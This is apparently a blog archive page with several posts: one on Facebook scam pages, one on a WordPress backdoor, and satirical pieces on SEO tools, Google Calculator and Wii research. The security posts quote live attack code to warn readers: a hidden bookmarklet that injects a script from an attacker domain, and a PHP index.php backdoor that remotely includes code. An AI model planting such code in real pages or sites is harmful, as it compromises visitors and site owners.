Facebook has never been known for it’s safety. It is a site designed so that the least Internet savvy people out there can sign up and network with millions of other people, both those they know and those they don’t, with only a minimal amount of technical know-how required (ie. how to sign up, and how to browse). It is a giant playground filled with games and people to talk to from all over the world, luring in droves of people who, when they come, know nothing about “scareware”, or “phishing scams”, or even how to clean a virus from their machine if they get one. Sure, they’ve been told that if they visit porn sites they could very well get a virus, but hey, this is Facebook, everyone is on Facebook… it must be safe. The result is a gigantic community of gullible marks just waiting to be exploited or infected by scammers and hackers.

That is why a couple of years ago I wrote a post on how to prevent getting hacked on Facebook (as well as on Twitter or Myspace). I happen to have quite a few friends and family who are not highly knowledgeable when it comes to the Internet, and through talking to them I came to realize that some of the things I take for granted many people were just not aware of. In the article I went into depth on some of the very basics of Internet security, such as what is the address bar in the browser, and how you needed to be sure you were on the site you thought you were on. That one simple tip could have saved millions of victims of phishing scams, had they just known where to look. Now, some fucking moron developer employed by Mark Zuckerberg has gone and rendered that advice pretty much pointless, at least as far as Facebook is concerned.

For those of you who own WordPress blogs, you are probably aware that if you get hacked one of the biggest dangers to your readers is the iframe hack. For those of you who don’t, or who are not familiar with html, an iframe is an element on a webpage that allows you to embed a second webpage into it. It’s very common and a perfectly normal feature of the html language. Iframes in and of themselves are not dangerous. Google AdSense , when shown on a webpage other than Google, is in an iframe. The same goes for Facebook “Like” buttons. So when you visit a page that has either of those, you are visiting Google or Facebook at the same time. The important thing for webmasters to note is that you only ever embed iframes from sites you trust. The reason this is so crucial is because once you embed an iframe from a site other than your own, you have no control whatsoever over what content is served from that iframe to your visitors. None. Nadda. Zilch.

The reason that hackers like utilizing iframes for hacking is that it allows them to serve malicious code and viruses to people while they are visiting sites that they trust. If you are out there browsing some seedy sites and popups show up telling you to click on a link or that you might have a virus you are much less likely to believe it. It’s simple psychology, and your guard is already up. This is much less true if you are on a site you visit every single day with no problems.

Apparently I missed it when it happened, but a couple of months ago some genius programmer at Facebook decided to introduce a way for people to utilize iframes into Facebook Pages. I only found out about it myself when I discovered one of these pages yesterday. It was a link on a friend’s wall purporting to show pics of Osama bin Laden dead. I could tell right away that it was a scam, so I went to see just how potentially damaging it was. The first thing that struck me was that this was a page actually on Facebook itself, although it was giving instructions to enter in a series of keyboard commands, as if there were Javascript it was trying to get you to trigger. I moused around a bit, and realized there were some hidden forms on the page, which was really odd, so I went ahead and turned off all styles on the page. That’s what I saw what was going on. This is what the page looked like with normal styles turned on:

(click to enlarge)

Clicking that button then revealed these instructions:

What was not revealed, however, was the hidden <textarea> containing Javascript code that would then be fired if you did follow those instructions:

<textarea id="c">javascript:(a=(b=document).createElement('script')).src='//themafiafamily.net/bin/bl.js',b.body.appendChild(a);void(0)</textarea>

This causes a script to be injected from a domain owned by some hacker, themafiafamily.net, and it’s all downhill from there.

Of course, odds are pages like this won’t stay up for too long when they are created. There is a way to report them, and Facebook will eventually take them down once they investigate. However, there is no way to report them in a way that gets them dealt with in a timely manner. There is no “This page is hacking users” option. In fact, if you look at the “Like” counter on that page you can see that it had already hit over 109,000 people by the time I saw it, and who knows how many more before Facebook bothered to respond to the reports about it. Additionally, there is nothing stopping a hacker from running a legitimate page for a few weeks, attracting millions of people, and then deciding to hit them all with a virus afterwards.

The bottom line is that Facebook not addressing these issues and removing the ability to embed iframes borders on negligence. Currently the FTC goes after companies and organizations that do not adequately protect their user’s data:

Maybe they should start taking a look at companies that don’t adequately protect the actual users as well.

(click to view full sized)

You can click here to view the actual search.

I am a big one for testing, and test this tool I did. Now, I know, I may have voiced some opinions in the past as to my doubt of the sincerity of Rand Fishkin and the folks who run things over at SEOmoz, but regardless of what I said before, for me seeing is definitely believing. I plugged both the url for the post introducing the tool itself, along with the phrase [made up statistical bullshit], into the tool’s interface, and sure as hell this is what the tool showed me:

(click to enlarge)

I mean, c’mon now… those words weren’t used anywhere in the article, yet this tool was able to accurately determine that at least half* of everything that Rand said was relevant to that phrase?

I don’t know about you, but I’m convinced.

* and yes, I know, the tool guessed numbers that were way low compared to the actual quantity of bullshit in the article, but seriously… you know as well as I do that any tool that can automatically detect even trace amounts of bullshit in a post is going to be a game changer.

One of the hacks that has been around for a few years has the symptoms of having an index.php in the root installation that has the following code in it:

16
17
18
19
20
21

/** Loads the WordPress Environment and Template */
if (isset($_GET['license'])) {
	@include('http://wordpress.net.in/license.txt');
} else {
	require('./wp-blog-header.php');
}

The index.php found in a clean installation of WordPress does not have an IF statement in it, and the section that is actually delivering the hack is the statement telling the page to include() license.txt located on wordpress.net.in. If you try to view that page in a browser what you currently would see is version 3 of the GNU General Public License. However, if the file is called as an include(), it instead delivers code that acts as a back door and allows, I believe, the injection of an erroneous administrator into the WordPress installation. From there pretty much anything can be done.

The wordpress.net.in domain itself, which is being used to deliver this hack, was originally registered back in April 2007, supposedly to some guy in Massachusetts:

A little over 3 years later, after at least 31 changes in domain registration information, the domain is still supposedly registered to some guy in Massachusetts, although not to the same person:

The domain has been used for these hacking activities the entire time it has existed. There has never been a legitimate site residing on it.

By checking the IP address of where the site is now, it appears to be hosted by a firm operating under the name Extended Host Inc, which according to their whois information is located in Canada. However, they don’t seem to actually have a website where someone could get hosting services, and their IP is located over in Amsterdam. This is what Spamhaus had to say about Extended Host:

While none of this actually tells us anything about who the real owner of the domain is, what it does tell us is that there is very little that can be done about it. The hosting company is a scam, so there is no one to contact to have them take the website down. Even if the current bandwidth provider did decide to take action against them they could simply move to a new provider. There are plenty of hacker and spammer friendly hosts out there to choose from. The sad truth is that there is little that honest concerned netizens such as you or I can do to take a website like this offline. It is a shame, too, because taking the website down would mean that the hack it is being used for, across however many thousands of WordPress installations out there that are infected, would no longer be effective. It would nullify the damage, even for those blog owners who do not know that they are hacked.

No, there really isn’t much that you or I could do about that site… but there is actually someone who could do something, if they so wanted. You see, the domain in question, wordpress.net.in, consists entirely of the WordPress trademark, a trademark owned by Automattic Inc, the company founded by one Matt Mullenweg, the original creator of WordPress. According to their website they are quite aware of the fact that using WordPress in a domain is a trademark violation, and trademark violations are pretty much the one thing that allows one person to legitimately take a domain from another person without their consent. According to the ICANN Domain Name Dispute Resolution Policy there are 3 conditions that must be met for this to happen:

• (i) your domain name is identical or confusingly similar to a trademark or service mark in which the complainant has rights; and
• (ii) you have no rights or legitimate interests in respect of the domain name; and
• (iii) your domain name has been registered and is being used in bad faith.

In this case 1 is a no-brainer… the domain name is an exact match for the trademark in question. I am pretty sure that unless the owner of the domain name turns out to be one of the other founders of Automattic number 2 will pass the test without question as well. As for requirement 3, I don’t think you could really get more “bad faith” than deliberately using the domain name to hack other websites. If Matt actually cared he would have no problem wrestling control of that domain name from whoever it is that actually owns it, and shutting it down altogether, and yet he has done nothing about it for over three years now. Apparently Matt is so obsessively concerned with his crusade against non-GPL WordPress plugin and theme developers that he doesn’t have the time or energy to go after someone using his trademark to hack software he wrote. In his campaign against the evils of non-GPL he has even gone so far as to start banning people from speaking at or sponsoring Wordcamp events if they are “non-GPL-compliant” (a determination, btw, which is solely made by Matt and company, with apparently no procedure in place for appeals):

They are welcome to attend, but WordCamps may not have non-GPL-compliant people as organizers, sponsors, or speakers. Events that want to move forward and include such individuals in these roles may need to use a name other than WordCamp if the appropriate adjustments can’t be made. – Jane Wells, WordCamp “central liaison”

That’s right… if you wish to put the effort into organizing an event that promotes WordPress in your community, and you take the time to raise the money yourself to do so, but you happen to be a person who directly sells premium themes, then you damn well better not use their trademarked name for the event. If you want to spread viruses, hack servers, and promote spam, however… hell, feel free to use their core trademark in your domain name. It’s not like they are going to actually do anything about it.

I was playing around with the functions on Google Calculator last week, when I noticed some of the calculations weren’t quite right. Maybe Michael Bolton from Office Space was involved in writing the Google Calculator app, and wound up putting a decimal in the wrong place, but something sure isn’t adding up.

For those that don’t know, water boils at 100 degrees Celsius and freezes at 0 degrees Celsius. In Fahrenheit the range is 212 degrees (boiling) to 32 degrees (freezing). Even for those of you who might not have remembered those figures off the top of your head, most of us did learn them fairly early in our academic careers… probably right around fourth or fifth grade. While those numbers may vary slightly under extreme pressures, for the most part they are pretty much standard. A simple search on Google will in fact verify that they are correct.

Overall I think that Google Calculator is a pretty cool tool. You can even type math in using English, and it will do it’s best to figure out how to interpret the numbers. Usually it does an excellent job. When I was playing with it the other day, however, I got this odd response:

Erm… no.

Way off. Not even in the same ballpark. Google did manage to group the numbers in a meaningful way, correctly guessing what I actually meant by that question, and yet somehow still came up with the wrong answer. If you can’t do it in your head, that should be (64F/2) = 32F = 0C, or water’s freezing point.

Maybe it just has a problem with temperatures on the low end, I thought, and that if I go the other way we might get better results:

Wow. That’s hot. Also wrong.

Apparently not. That one should be 106F * 2 = 212F = 100C, or the temperature at which water boils. Instead we get temperatures hotter than most home ovens can go.

To give Google the benefit of the doubt, I decided to try and take out the conversions altogether, and just let it do simple temperature calculations, staying in just one measurements system:

Not even close. Google fails.

Nope, still no math love from the search giant. I guess Google just needs to go back to school.

According to Science Daily’s summary of the research done by the University of Oklahoma,

Wii bowling and beginner level DDR elicited a 2-fold increase in energy expenditure compared to television watching. Overall, the energy expenditure during active video game play was comparable to moderate-intensity walking. Thus, for children who spend considerable time playing electronic screen games for entertainment, OU researchers found that substituting that time with physically active games can be a safe, fun and valuable means of promoting energy expenditure.

Let me give you a little of my own research.

Test 1: Sit on my derriere for 10 minutes watching TV. Am I tired? Nope. Not even a little.

Test 2: Play a Wii game like bowling or boxing or even yoga for 10 minutes. Am I tired? Nope. I’m EXHAUSTED.

Still not convinced? Would pictures make a difference?

Research Test 1:

Research Test 2:

I’m not sure what kind of research our universities are conducting these days, but I’m pretty sure this is the kind that does NOT need to be undertaken.

Go get your kids a Wii, let them play some physically active games, and know in your inner soul that they are expending energy. Really, you don’t need any scientific research to tell you that. It’s a Duh moment.